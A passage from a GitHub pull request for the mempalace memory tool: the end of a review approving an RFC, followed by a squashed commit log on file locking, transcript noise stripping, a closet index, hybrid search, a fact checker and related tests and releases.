  • §13 rollout sequence is realistic — cleanup first, spec second, Chroma updated third, in-flight rebased fourth, migration CLI fifth. Matches what's actually achievable.

Observation, not actionable

  • RFC 002 (source adapter plugin spec) shipped in v3.3.2 ahead of RFC 001. The numbering doesn't imply ordering, but it's worth noting Igor is comfortable shipping concrete implementation ahead of formal RFC merge. The §10 cleanup discipline + §11 PR impact table here suggest that's a deliberate pattern, not drift. Approving on the strength of that.

Once the UUID gets assigned and the four small clarifications are folded in, this is ready to merge as the contract that the v4.0-alpha backend work targets. Status can move from Draft to Accepted with a date.

arncore added a commit to arncore/mempalace that referenced this pull request Apr 25, 2026
* feat: add Hindi language support to i18n module

* Create SECURITY.md

This PR introduces a standard SECURITY.md policy file to the repository. 

While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. 

I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established.

* fix: save hook auto-mines transcript without MEMPAL_DIR (#840)

TDD: test written first, failed, then fixed.

Problem: save hook says "saved in background" but MEMPAL_DIR defaults
to empty, so nothing actually mines. Users get no auto-save despite
the hook firing every 15 messages.

Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's
JSON input) to discover the session directory. Mine that directory
automatically. MEMPAL_DIR is still supported as override but no
longer required.

Also fixed: bare python3 → $(command -v python3) for nohup safety.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* release: v3.3.0 (#839)

* fix: add file-level locking to prevent multi-agent duplicate drawers

Root cause: when multiple agents mine simultaneously, both pass
file_already_mined() check, both delete+insert the same file's
drawers, creating duplicates or losing data.

Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on
Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock
per-file during the delete+insert cycle and re-check after acquiring
the lock.

Tested:
- Lock acquires and releases correctly
- Second agent blocks until first releases (0.25s wait)
- 33/33 existing tests pass
- Cross-platform: fcntl (macOS/Linux), msvcrt (Windows)

Based on v3.2.0 tag.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
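The locking scheme described above can be sketched as follows — illustrative only; the shipped `mine_lock()` in palace.py may differ in detail:

```python
import os
import tempfile
from contextlib import contextmanager

@contextmanager
def mine_lock(lock_path):
    # Cross-platform exclusive file lock: fcntl.flock on Unix, msvcrt.locking
    # on Windows. Callers re-check file_already_mined() after acquiring, since
    # another agent may have finished the delete+insert cycle while we waited.
    fh = open(lock_path, "a+")
    try:
        if os.name == "nt":
            import msvcrt
            fh.seek(0)
            msvcrt.locking(fh.fileno(), msvcrt.LK_LOCK, 1)  # blocks until free
            def unlock():
                fh.seek(0)
                msvcrt.locking(fh.fileno(), msvcrt.LK_UNLCK, 1)
        else:
            import fcntl
            fcntl.flock(fh.fileno(), fcntl.LOCK_EX)  # blocks until free
            def unlock():
                fcntl.flock(fh.fileno(), fcntl.LOCK_UN)
        try:
            yield
        finally:
            unlock()
    finally:
        fh.close()
```

Note the BSD caveat that surfaces later in this log: `flock` on macOS is per-process, so the lock serializes separate mining *processes*, not threads within one process.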

* fix: strip system tags, hook output, and Claude UI chrome from drawers

normalize.py now strips before filing:
- <system-reminder>, <command-message>, <command-name> tags
- <task-notification>, <user-prompt-submit-hook>, <hook_output> tags
- Hook status messages (CURRENT TIME, Checking verified facts, etc.)
- Claude Code UI chrome (ctrl+o to expand, progress bars, etc.)
- Collapsed runs of blank lines

This noise was going straight into drawers, wasting storage space
and polluting search results. strip_noise() runs on all normalized
output regardless of input format (JSONL, JSON, plain text).

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: add closet layer — searchable index pointing to drawers

The closet architecture was always part of MemPalace's design but
never shipped in the public codebase. This adds it.

Palace now has TWO collections:
- mempalace_drawers — full verbatim content (unchanged)
- mempalace_closets — compact AAAK-style index entries

How it works:
- When mining, each file gets a closet alongside its drawers
- Closet contains extracted topics, entities, quotes as pointers
- Closets pack up to 1500 chars, topics never split mid-entry
- Search hits closets first (fast, small), then hydrates the
  full drawer content for matching files
- Falls back to direct drawer search if no closets exist yet

Files changed:
- palace.py: get_closets_collection(), build_closet_text(),
  upsert_closet(), CLOSET_CHAR_LIMIT
- miner.py: process_file() now creates closets after drawers
- searcher.py: search_memories() tries closet-first search,
  hydrates drawers, falls back to direct search

Backwards compatible — existing palaces without closets continue
to work via the fallback path. Closets are created on next mine.

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: enforce atomic topics in closets, extract richer pointers

- upsert_closet replaced by upsert_closet_lines: checks each topic
  line individually against CLOSET_CHAR_LIMIT. If adding one line
  WHOLE would exceed the limit, starts a new closet. Never splits
  mid-topic.
- build_closet_lines returns a list of atomic lines (not joined text)
- Richer extraction: section headers, more action verbs, up to 3
  quotes, up to 12 topics per file
- Each line is complete: topic|entities|→drawer_refs

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
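The atomic-packing rule above — a line that would overflow the limit starts a new closet, and lines are never split — can be sketched like this (function name and greedy strategy are illustrative, not the real upsert_closet_lines API):

```python
CLOSET_CHAR_LIMIT = 1500  # value taken from the commit message above

def pack_closets(lines, limit=CLOSET_CHAR_LIMIT):
    """Greedy packing: each closet holds whole lines only; a line whose
    addition would push the closet past the limit starts a new closet."""
    closets, current, size = [], [], 0
    for line in lines:
        cost = len(line) + (1 if current else 0)  # +1 for the joining newline
        if current and size + cost > limit:
            closets.append("\n".join(current))
            current, size = [], 0
            cost = len(line)
        current.append(line)
        size += cost
    if current:
        closets.append("\n".join(current))
    return closets
```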

* docs: add CLOSETS.md — closet layer overview

Cherry-picked the docs portion of 67e4ac6 to accompany the closet
feature. Test coverage for closets is bundled into an omnibus with the
entity-metadata and BM25 tests (see the PR targeting those features)
and will land together in a follow-up.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat: entity metadata + diary ingest + BM25 hybrid search

Three features that close the gap between the architecture docs
and the actual codebase:

1. Entity metadata on drawers and closets
   - _extract_entities_for_metadata() pulls names from known_entities.json
     + proper nouns appearing 2+ times
   - Stamped as "entities" field in ChromaDB metadata
   - Enables filterable search by person/project name

2. Day-based diary ingest (diary_ingest.py)
   - ONE drawer per day, upserted as the day grows
   - Closets pack topics atomically, never split mid-topic
   - Tracks entry count in state file, only processes new entries
   - Usage: python -m mempalace.diary_ingest --dir ~/summaries

3. BM25 hybrid search in searcher.py
   - _bm25_score() keyword matching complements vector similarity
   - _hybrid_rank() combines both signals (60% vector, 40% BM25)
   - Catches exact name/term matches that embeddings miss
   - Applied to both closet-first and direct drawer search paths

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
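The 60/40 blend described in point 3 can be sketched as below. The keyword scorer here is a toy term-overlap stand-in for the real BM25 implementation, and the function names are mine:

```python
def _keyword_score(query: str, doc: str) -> float:
    # Toy stand-in for BM25: fraction of query terms present in the doc.
    terms = set(query.lower().split())
    if not terms:
        return 0.0
    return len(terms & set(doc.lower().split())) / len(terms)

def hybrid_rank(query, docs, vector_scores, w_vec=0.6, w_kw=0.4):
    """Blend precomputed vector similarity with a keyword signal
    (60% vector / 40% keyword per the commit above), best-first."""
    scored = [
        (w_vec * vector_scores[i] + w_kw * _keyword_score(query, doc), doc)
        for i, doc in enumerate(docs)
    ]
    return [doc for _, doc in sorted(scored, key=lambda t: -t[0])]
```

The keyword term rescues exact name/identifier matches that embeddings blur, while the vector term still dominates when no terms overlap.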

* test: add tests for mine_lock, closets, entity metadata, BM25, diary

Trimmed version of Milla's omnibus test_closets.py to only cover
features present in this PR stack (#784 lock, #788 closets, this
PR's entity/BM25/diary). Strip-noise tests will land with #785;
tunnel tests will land with the tunnels PR.

16/16 pass.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat: explicit cross-wing tunnels for multi-project agents

Adds active tunnel creation alongside passive tunnel discovery.

Passive tunnels (existing): rooms with the same name across wings.
Explicit tunnels (new): agent-created links between specific
locations. "This API design in project_api relates to the database
schema in project_database."

New functions in palace_graph.py:
- create_tunnel() — link two wing/room pairs with a label
- list_tunnels() — list all explicit tunnels, filter by wing
- delete_tunnel() — remove a tunnel by ID
- follow_tunnels() — from a room, find all connected rooms in
  other wings with drawer content previews

New MCP tools:
- mempalace_create_tunnel
- mempalace_list_tunnels
- mempalace_delete_tunnel
- mempalace_follow_tunnels

Tunnels stored in ~/.mempalace/tunnels.json (persists across
palace rebuilds). Deduplicated by endpoint pair.

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test: add TestTunnels for cross-wing tunnel operations

Appended from Milla's omnibus test_closets.py — covers create,
list, delete, dedup, and follow_tunnels behavior. 21/21 pass.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat(search): drawer-grep returns best-matching chunk + neighbors

When a closet hit leads to a source file with many drawers, grep each
chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor
on each side, instead of dumping the whole file truncated at
MAX_HYDRATION_CHARS. Result now includes drawer_index and
total_drawers so callers can request adjacent drawers explicitly.

Extracted from Milla's commit 935f657 which bundled drawer-grep with
closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker
(separate PR). Ported only the searcher.py change.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
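The best-chunk-plus-neighbors selection can be sketched as follows — a simplified stand-in for the searcher.py change, with illustrative names:

```python
def best_chunk_window(chunks, query_terms):
    """Grep each chunk for query terms, return the best-matching chunk plus
    one neighbor on each side, with its index and the total chunk count so
    callers can request adjacent drawers explicitly."""
    def hits(chunk):
        low = chunk.lower()
        return sum(low.count(t.lower()) for t in query_terms)

    best = max(range(len(chunks)), key=lambda i: hits(chunks[i]))
    lo, hi = max(0, best - 1), min(len(chunks), best + 2)
    return {
        "text": "\n".join(chunks[lo:hi]),
        "drawer_index": best,
        "total_drawers": len(chunks),
    }
```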

* feat: offline fact checker against entity registry + knowledge graph

fact_checker.py verifies text for contradictions against locally stored
entities and KG facts. Catches similar-name confusion (Bob vs Bobby),
relationship mismatches (KG says husband, text says brother), and
stale facts (KG valid_from/valid_to).

No hardcoded facts. No network calls. Reads:
- ~/.mempalace/known_entities.json
- KnowledgeGraph SQLite

Usage:
  from mempalace.fact_checker import check_text
  issues = check_text("Bob is Alice's brother", palace_path)

  # CLI
  python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace

Extracted from Milla's commit 935f657 which bundled this with
closet_llm (deferred) and drawer-grep (PR #791). Ported only
fact_checker.py — verified no network / API imports.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: optional LLM-based closet regeneration — bring-your-own endpoint

Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet
generation. Regex closets remain the default and cover the local-first
promise; users who want LLM-quality topics can bring their own endpoint.

Configuration (env or CLI flag):
  LLM_ENDPOINT — OpenAI-compatible base URL (required)
  LLM_KEY      — bearer token (optional; local inference skips this)
  LLM_MODEL    — model name (required)

Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any
other provider that speaks OpenAI-compatible /chat/completions. Zero new
dependencies — uses stdlib urllib.

Replaces the original Anthropic-SDK-hardcoded version of this module
from Milla's branch (commit 935f657). Same prompt, same parsing, same
regenerate_closets flow; only the transport was generalised so the
feature doesn't lock users into a specific vendor or require API keys
for core memory operations (CLAUDE.md, "Local-first, zero API").

Includes 13 unit tests covering config resolution, request shape,
auth-header omission when no key is set, code-fence stripping, and
missing-config error path. All mocked — zero network calls in tests.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795)

* Fix: set cosine distance metadata on all collection creation sites

ChromaDB defaults HNSW index to L2 (Euclidean) distance, but
MemPalace scoring uses 1-distance which requires cosine (range 0-2).
Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test
call sites that were missing it.

Closes #218

* fix: sync version.py to 3.2.0

Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed
mempalace/version.py, breaking test_version_consistency on
every PR's CI. This syncs them.

* refactor: extract locked filing block to keep mine_convos under C901

Adding the per-file lock + double-checked file_already_mined() in the
previous commit pushed mine_convos cyclomatic complexity from 25 to 26,
just over ruff's max-complexity threshold. Hoist the locked critical
section into _file_chunks_locked() so the outer loop stays within
budget. No behavior change.

* style: ruff format mempalace/palace.py

Add blank lines after inline imports in mine_lock. Pure formatting.

* fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL

The initial strip_noise() regressed on three fronts when audited against
adversarial user content — each verified with executable repros against
the cherry-picked code:

  1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one
     stray unclosed <system-reminder> anywhere in a session merged with
     the next closing tag, silently deleting everything between them
     (including full assistant replies).
  2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose
     whenever a user happened to document the TUI shortcut.
  3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the
     second sentence from "our CI has a stop hook ... Ran 2 stop hooks
     last week" — legitimate user commentary.

These are unambiguous violations of the project's "Verbatim always"
design principle.

Fixes:

- All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their
  body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a
  dangling open tag cannot eat neighboring messages.
- `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user
  prose mentioning "CURRENT TIME:" mid-sentence is preserved.
- Hook-run chrome requires `(?m)^`, explicit hook names (Stop,
  PreCompact, PreToolUse, etc.), and no IGNORECASE.
- "… +N lines" is line-anchored.
- "(ctrl+o to expand)" only matches Claude Code's actual collapsed-
  output chrome shape `[N tokens] (ctrl+o to expand)`; a bare
  parenthetical in user prose stays intact.

Scope:

- `strip_noise()` is no longer called on every normalization path.
  Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so
  Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and
  plain text with `>` markers pass through fully verbatim. Per-message
  application also makes span-eating structurally impossible.

Tests:

- 15 new tests in test_normalize.py pin the boundary: 6 guard user
  content that must survive (each of the adversarial repros), 9 assert
  real system chrome is still stripped. All pass; full suite 702 pass
  (2 failures are the unrelated pre-existing version.py bug, cleared
  by #820).

Known limitation (not fixed here): convo_miner.py does not delete
drawers on re-mine, so transcripts mined before this PR keep noise-
filled drawers until the user manually erases + re-mines. Proper fix
needs a schema-version field on drawer metadata + re-mine trigger —
out of scope for this PR.
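The line-anchored, blank-line-bounded tag pattern described in the fixes can be sketched for one tag — illustrative only; the shipped regexes cover more tags and chrome shapes:

```python
import re

# Line-anchored open tag; the body may span lines but is forbidden from
# crossing a blank line, so a dangling open tag cannot eat neighboring
# messages the way the old re.DOTALL `<tag>.*?</tag>` pattern did.
TAG = re.compile(
    r"(?m)^(?:> )?<system-reminder>"
    r"(?:(?!\n\s*\n)[\s\S])*?"
    r"</system-reminder>\n?"
)

def strip_reminder(text: str) -> str:
    return TAG.sub("", text)
```

When the tag is never closed before a blank line, the pattern simply fails to match and the surrounding user content passes through verbatim — erring toward keeping noise rather than deleting prose.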

* feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate

Without this, the strip_noise improvement only helps new mines. Every
user who had already mined Claude Code JSONL sessions would keep their
noise-polluted drawers forever, because convo_miner's file_already_mined
skip short-circuits before re-processing.

Adds a versioned schema gate so upgrades propagate silently:

- palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline
  changes shape (this PR's strip_noise is the v1→v2 bump).
- file_already_mined now returns False if the stored normalize_version
  is missing or less than current, triggering a rebuild on next mine.
- Both miners stamp drawers with the current normalize_version.
- convo_miner now purges stale drawers before inserting fresh chunks
  (mirrors miner.py's existing delete+insert), extracted into
  _file_convo_chunks helper to keep mine_convos under ruff's C901 limit.

User experience: upgrade mempalace, run `mempalace mine` as usual, old
noisy drawers get silently replaced with clean ones. No erase needed,
no "you need to rebuild" changelog footgun.

Tests:
- test_file_already_mined_returns_false_for_stale_normalize_version —
  pins the version gate contract for missing/v1/current.
- test_add_drawer_stamps_normalize_version — fresh project-miner drawers
  carry the field.
- test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end
  proof that a pre-v2 palace gets silently cleaned on next mine, with
  orphan drawers purged and NOT skipped.

Existing test_file_already_mined_check_mtime updated to include the
new field; all other tests unaffected.
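The version-gate contract pinned by those tests reduces to a small predicate — sketched here with an illustrative helper name (the real check lives inside file_already_mined):

```python
NORMALIZE_VERSION = 2  # bumped whenever the normalization pipeline changes shape

def needs_remine(stored_meta: dict) -> bool:
    """A file is rebuilt when its drawers were stamped by an older (or
    unversioned) normalization pipeline — the inverse of the mined-skip."""
    return stored_meta.get("normalize_version", 0) < NORMALIZE_VERSION
```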

* fix: stop hooks from making agents write in chat — save tokens

The save hook and precompact hook were telling the agent to write
diary entries, add drawers, and add KG triples IN THE CHAT WINDOW.
Every line written stays in conversation history and retransmits on
every subsequent turn — ~$1/session in wasted tokens.

Fix: hooks now say "saved in background, no action needed" and use
decision: allow instead of block. The agent continues working without
interruption. All filing happens via the background pipeline.

Also updated hooks README with:
- Known limitation: hooks require session restart after install
- Updated cost section: zero tokens, background-only

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use microsecond timestamp and full content hash in diary entry ID (#819)

* fix: remove unused import 'main' from mempalace/__init__.py

Removed the 'main' import from `mempalace/__init__.py` and updated
`pyproject.toml` to point the script entry point directly to
`mempalace.cli:main`. This ensures the CLI remains functional while
improving code hygiene.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

* merge: full hardened stack + rewrite fact_checker around actual KG API

Merges the full hardened stack (up through #791 drawer-grep) and turns
fact_checker from "dead code hidden behind bare except" into an
actually-working offline contradiction detector with tests.

## Dead paths the PR body advertised but the code never executed

Both buried by a single outer ``except Exception: pass``:

  * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method;
    it has ``query_entity()``. The attribute error was silently swallowed
    and the entire KG branch always returned ``[]``. Now using
    ``kg.query_entity(subject, direction="outgoing")`` with proper
    handling of the ``predicate``/``object``/``current``/``valid_to``
    fields the real API returns.
  * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only
    kwarg is ``db_path``. Passing ``palace_path`` raised TypeError,
    silently swallowed. Now computing the db_path correctly from
    ``<palace>/knowledge_graph.sqlite3``, matching the convention the
    MCP server already uses.

## Contradiction logic rewritten

The previous ``if kg_pred in claim and fact.object not in claim`` only
fired when text used the SAME predicate word as the KG fact — the exact
opposite of the stated use case ("Bob is Alice's brother" when KG says
husband" would NOT have fired). Replaced with a proper parse → lookup
→ compare pipeline:

  * ``_extract_claims`` parses two surface forms ("X is Y's Z" and
    "X's Z is Y") into ``(subject, predicate, object)`` triples.
  * ``_check_kg_contradictions`` pulls the subject's outgoing facts
    and flags two classes:
      - ``relationship_mismatch`` when a current KG fact matches the
        same ``(subject, object)`` pair but with a different predicate.
      - ``stale_fact`` when the exact triple exists but is
        ``valid_to``-closed in the past.
  * Stale-fact detection is now implemented (the PR body claimed it;
    the old code silently didn't implement it).

## Performance fix — O(n²) → O(mentioned × n)

``_check_entity_confusion`` previously computed Levenshtein for every
pair of registered names on every ``check_text`` call. For 1,000
registered names that's ~500K edit-distance calls per hook invocation.
Now we first identify which registry names actually appear in the text
(single regex scan), then only compute edit distance between mentioned
and unmentioned names. Pinned by a test that asserts <200ms on a 500-
name registry with zero mentions.

Also: when *both* similar names are mentioned in the text, we no
longer flag them — the user clearly knows they're different people.
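The mentioned-first strategy can be sketched as below; `difflib` stands in for the real Levenshtein check, and the function names are illustrative:

```python
import re
from difflib import SequenceMatcher

def similar(a, b, threshold=0.8):
    # difflib ratio as a stand-in for the edit-distance check in the real code.
    return a != b and SequenceMatcher(None, a.lower(), b.lower()).ratio() >= threshold

def confusion_candidates(text, registry):
    """Scan once for which registry names appear in the text, then compare
    only mentioned names against the rest: O(mentioned x n), not O(n^2).
    Pairs where BOTH names are mentioned are skipped — the author evidently
    knows they are distinct people."""
    mentioned = [n for n in registry
                 if re.search(r"\b" + re.escape(n) + r"\b", text)]
    mentioned_set = set(mentioned)
    return [
        (m, other)
        for m in mentioned
        for other in registry
        if other not in mentioned_set and similar(m, other)
    ]
```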

## Shared entity-registry loader

``mempalace/miner.py`` already had an mtime-cached loader for
``~/.mempalace/known_entities.json``. fact_checker had a duplicate
implementation that leaked file handles and ignored caching. Extended
miner's cache to expose both the flat set (``_load_known_entities``)
and the raw category dict (``_load_known_entities_raw``); fact_checker
now imports the latter. No more double disk reads, no more handle leak.

## Tests — 24 cases in tests/test_fact_checker.py

All three detection paths + both dead-code regressions:
  * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the
    correct KG constructor signature so the ``palace_path=`` bug can't
    come back.
  * ``test_relationship_mismatch_detected`` — the headline example from
    the PR body now actually fires.
  * ``test_stale_fact_detected`` — valid_to-closed triple is flagged.
  * ``test_current_fact_same_triple_is_not_flagged`` — no false positive
    on a still-valid match.
  * ``test_performance_bounded_by_mentioned_names`` — 500-name registry,
    zero mentions, <200ms. Regression for the O(n²) blowup.
  * ``test_no_false_positive_when_both_names_mentioned`` — Mila and
    Milla in the same text is fine.
  * Plus claim extraction, flatten_names shapes, CLI exit code, empty
    text handling, missing-palace graceful fallback, registry-dict
    shape support.

785/785 suite pass. ruff + format clean on CI-pinned 0.4.x.

* Optimize entity detection with regex caching and pre-compilation

- Use functools.lru_cache to cache compiled patterns for entity names.
- Pre-compile static pronoun patterns into a single regex.
- Remove redundant .lower() calls in score_entity loop.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

* docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787)

Follow-up to #766 which covers version.py, pyproject.toml, README,
CHANGELOG, and CONTRIBUTING. These 11 files still had the old org
name in URLs:

- website/ (VitePress config + 6 docs pages)
- .claude-plugin/ (plugin.json repository, README marketplace command)
- .codex-plugin/ (plugin.json URLs, README links)

Author name fields are intentionally unchanged.

* test: make diary state path assertion platform-neutral

The Windows CI job failed on:

    assert '/.mempalace/state/' in str(state_path)

because Windows uses ``\`` as the path separator, so the substring
never matches. The behavior under test (state file lives outside the
diary dir, under ``~/.mempalace/state/``) is already correct on both
platforms — only the assertion was Unix-only.

Switch to ``state_path.parent`` comparisons that work on any OS.

* test: serialize mine_lock concurrency test with multiprocessing

The macOS CI job failed ``test_lock_blocks_concurrent_access`` because
``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads
in the same process both acquire even when they open their own file
descriptors. The test passed on Linux (per-FD flock) and Windows
(per-FD ``msvcrt.locking``) but was never actually exercising the
lock's real contract.

``mine_lock`` is designed to serialize multi-*agent* access — i.e.,
separate processes, not threads. Switch the test to
``multiprocessing.get_context('spawn')`` with a module-level worker
(so the spawn pickles cleanly) so it:

  1. reflects the actual use case (one lock per mining process);
  2. passes on all three OSes without flock-semantics branching;
  3. catches real regressions (a broken lock would now let both
     processes through, exactly what we care about).

Hold time bumped to 0.3s and the "wait until p1 acquires" delay to
0.2s to tolerate spawn's higher startup latency on macOS/Windows.

* test: verify mine_lock via disjoint critical-section intervals

The previous revision used multiprocessing but still relied on timing
("second process waited at least N seconds") which flakes on CI where
spawn overhead eats into the hold window. Linux CI observed the second
process report a 0.088s wait — below the 0.1s threshold — even though
the lock behavior was correct; spawn was just slow enough that the
first process had nearly finished holding when the second got past
its own spawn.

Switch to effect-based verification: each worker logs its
[enter_time, exit_time] inside the critical section, and the test
asserts the two intervals are disjoint after sorting. A broken lock
would produce overlapping intervals regardless of spawn latency; a
working lock cannot.

Also removed the mp.Queue since we no longer pass timing data back.
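The disjointness assertion reduces to a few lines — sketched here with an illustrative helper name:

```python
def intervals_disjoint(intervals):
    """Effect-based lock check: sort critical-section (enter, exit) pairs and
    require each to finish before the next begins. No timing thresholds, so
    spawn latency can't flake the test; a broken lock overlaps regardless."""
    ordered = sorted(intervals)
    return all(prev_exit <= next_enter
               for (_, prev_exit), (next_enter, _) in zip(ordered, ordered[1:]))
```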

* Fix: ruff format with CI-pinned version (0.4.x)

* fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835)

* fix: README audit — match every claim to shipped code + add hall detection

TDD audit: wrote 42 tests verifying README claims against codebase.
Fixed all 7 failures:

1. Tool count: 19 → 29 (10 tools were undocumented)
2. Added tool table rows for tunnels, drawer management, system tools
3. Version badge: 3.1.0 → 3.2.0
4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers"
5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py)
6. pyproject.toml version in project structure: v3.0.0 → v3.2.0
7. Hall detection: added detect_hall() to miner.py — drawers now tagged
   with hall metadata so palace_graph.py can build hall connections

New code:
- miner.py: detect_hall() — keyword scoring against config hall_keywords,
  writes hall field to every drawer's metadata
- tests/test_hall_detection.py — 12 TDD tests (written before code)
- tests/test_readme_claims.py — 42 TDD tests verifying README accuracy

859/859 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: resolve ruff lint — unused imports and variables

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: ruff format with CI-pinned 0.4.x

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use conftest fixtures in hall tests for Windows compat

Windows CI fails with NotADirectoryError when ChromaDB tries to
write HNSW files in short-lived TemporaryDirectory. Use conftest
palace_path and tmp_dir fixtures instead — same pattern as all
other tests that touch ChromaDB.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address Igor's review — convo_miner halls, cached config, markdown typo

TDD: wrote tests for convo_miner hall metadata and config caching
BEFORE verifying the code changes.

1. README markdown typo: extra ** in wake-up token row (line 195)
2. convo_miner.py: added _detect_hall_cached() — conversation
   drawers now get hall metadata (was missing, Igor caught it)
3. miner.py + convo_miner.py: cached hall_keywords at module level
   so config.json isn't re-read per drawer during bulk mine
4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching

861/861 tests pass. ruff clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(website): update vitepress base url for custom domain

* chore(release): bump version strings to 3.3.0 and curate CHANGELOG

Prepare develop for the 3.3.0 release cycle.

Version bumps:
- mempalace/version.py: 3.2.0 -> 3.3.0
- pyproject.toml: 3.2.0 -> 3.3.0
- README.md: pyproject.toml label and shields.io badge
- uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras)

CHANGELOG.md:
- Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12
  (v3.2.0 was tagged on that date but the release flip was never made)
- Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits
  since v3.2.0: closet layer, BM25 hybrid search, entity metadata,
  diary ingest, cross-wing tunnels, drawer-grep, offline fact checker,
  LLM-based closet regen, hall detection, cosine-distance fix,
  multi-agent locking, README audit, etc.
- Adopt Keep a Changelog + SemVer framing
- Add version compare reference links at the bottom
- Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace

---------

Co-authored-by: MSL <232237854+milla-jovovich@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: eblander <eblander@foundrydigital.com>
Co-authored-by: shafdev <96260000+shafdev@users.noreply.github.com>
Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
Co-authored-by: mvalentsev <michael@valentsev.ru>
Co-authored-by: Dominique Deschatre <43499065+domiscd@users.noreply.github.com>

* ci: serve docs from develop only

Docs deploy to GitHub Pages from develop for faster iteration cycles.
Main was failing the deploy step with "Branch 'main' is not allowed to
deploy to github-pages due to environment protection rules" on every
release merge (v3.2.0, v3.3.0) — noise without signal, since docs
weren't meant to serve from main anyway.

Removes main from both the push trigger and the deploy-job guard.
Develop continues to deploy as before; manual dispatch still works.

* fix(status): paginate metadata fetch to support large palaces

`col.get(limit=total)` causes SQLite "too many SQL variables"
on palaces with >10k drawers (#802) and on older versions the
hardcoded limit=10000 silently truncated the count (#850).

Paginate in 5k batches using offset and aggregate wing/room
counts incrementally. Also use `col.count()` for the header
instead of `len(metas)` so the displayed total is always correct.

Tested on a 122,686-drawer palace.

Fixes #850
Related: #802, #723
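
The batching pattern above can be sketched as follows — a minimal sketch, with `col` standing in for the ChromaDB collection handle and the 5k batch size from the commit:

```python
def paginated_metadatas(col, batch_size=5000):
    """Fetch all metadatas in fixed-size pages to stay under SQLite's
    bound-variable limit on large collections."""
    metas = []
    offset = 0
    while True:
        page = col.get(limit=batch_size, offset=offset)
        batch = page.get("metadatas") or []
        if not batch:
            break
        metas.extend(batch)
        offset += len(batch)
    return metas
```

Wing/room counts can then be aggregated per batch instead of materializing everything at once, and `col.count()` supplies the header total independently of the fetch.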

* refactor: route all chromadb access through ChromaBackend

Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.

* fix: update stale org URLs in pyproject.toml and README (#787)

